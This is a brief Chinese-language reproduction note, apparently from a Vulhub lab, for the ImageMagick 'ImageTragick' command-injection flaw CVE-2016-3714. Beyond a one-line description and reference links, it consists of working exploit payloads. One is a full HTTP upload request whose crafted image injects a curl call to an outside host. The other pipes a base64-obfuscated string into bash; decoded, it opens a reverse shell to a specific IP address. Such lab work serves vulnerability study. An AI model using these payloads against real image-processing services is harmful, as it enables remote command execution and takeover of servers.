Imagemagick 命令注入漏洞 (CVE-2016–3714)

漏洞环境均基于Vulhub

原因

ImageMagick 是一个免费的开源跨平台软件套件，用于显示、创建、转换、修改和编辑光栅图像。

推荐文章：

• https://imagetragick.com

• https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html

• https://github.com/ImageTragick/PoCs

复现

POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Length: 328

------WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Disposition: form-data; name="file_upload"; filename="1.gif"
Content-Type: image/png

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|curl "www.leavesongs.com:8889)'
pop graphic-context
------WebKitFormBoundarymdcbmdQR1sDse9Et--

可以看到www.leavesongs.com:8889已经收到http请求，curl命令执行成功后：

反弹shell

命令

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzIxNi4xMjcuMTY0LjIzOC85OTk5IDA+JjE= | base64 -d | bash`"||id " )'
pop graphic-context